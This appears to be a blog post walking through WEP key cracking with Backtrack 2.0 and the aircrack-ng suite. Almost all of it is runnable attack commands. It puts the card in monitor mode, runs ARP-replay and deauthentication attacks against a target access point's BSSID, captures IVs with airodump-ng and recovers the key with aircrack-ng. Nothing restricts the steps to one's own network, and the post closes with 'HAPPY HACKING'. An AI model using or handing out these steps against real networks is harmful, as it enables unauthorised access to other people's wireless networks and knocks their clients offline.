WEP Crack using Backtrack 2.0 on VMware workstation

List of equipments require for WEP cracking
  • download a copy of Backtrack2.0 final from http://remote-exploit.org/backtrack.html
  • Wireless card( DLINK DWL-G122 USB wireless dongle)
    • rat2500 driver
  • airodump
  • aireplay
  • aircrack
Step 1
once Backtrack 2.0 ISO loaded up and login to the system do the following

open up the shell command type
ifconfig rausb0 up
(bring the USB wireless dongle interface online)

iwconfig rausb0 mode monitor
(set wireless interface to monitor mode so you can start packet sniffing)

go to Kmenu-Backtrack-Radio network analysis-802.11-Analyser click on Kismet
(To start sniffing near by wireless Access Point ,to get BSSID address and their channel)

write down your BSSID address and channel on the paper or notepad

start typing in the shell command aireplay-ng -3 -b 00:16:B6:2E:C3:4E -h 00:13:a3:87:02:ab rausb0
(to start sending arp request to generating data packets for ivs file)
-3=standard ARP-request replay
-b=bssid(target AP Mac address)
-h -source address (Mac address of the device connect to the target AP)
rausb0=interface

start typing in the shell command airodump-ng --ivs -w testing --channel 10 rausb0
(to start capture ivs files from the Access Point)
--ivs = capture only ivs packets
-w=name of the ivs file
--channel=channel of the target Access Point
rausb0=wireless interface

If the arp packet still running slow do deauthentication attack follow the following
start typing in the shell command aireplay-ng -0 rausb0 -a 00:16:B6:2E:C3:4E rausb0
-0=deauthenticate 1 or all stations
-a=bssid (target AP Mac address)
rausb0=interface


Let airodump-ng capture all the packets for about 30mins
for 128 bits encryption you need about 400,000 or 1,000,000 packets


Once you have enough packets run the following command for generating WEP encryption key

start typing
aircrack-ng -0 -n 128 -f 4 test.ivs
-0= attack type
-n= wep key 64,128
-f= bruteforce fudge factor default is 2
If you have enough ivs packets you should see the wep key in just a mins
onces you got WEP key in HEX format you should know your way from there



HAPPY HACKING



Comments

Popular posts from this blog

DLL Injection:DVTA Walk through

Cracking WPA / WPA 2 with Reaver (WPS brute forcing attack tool)

Basic Computer security for Home Users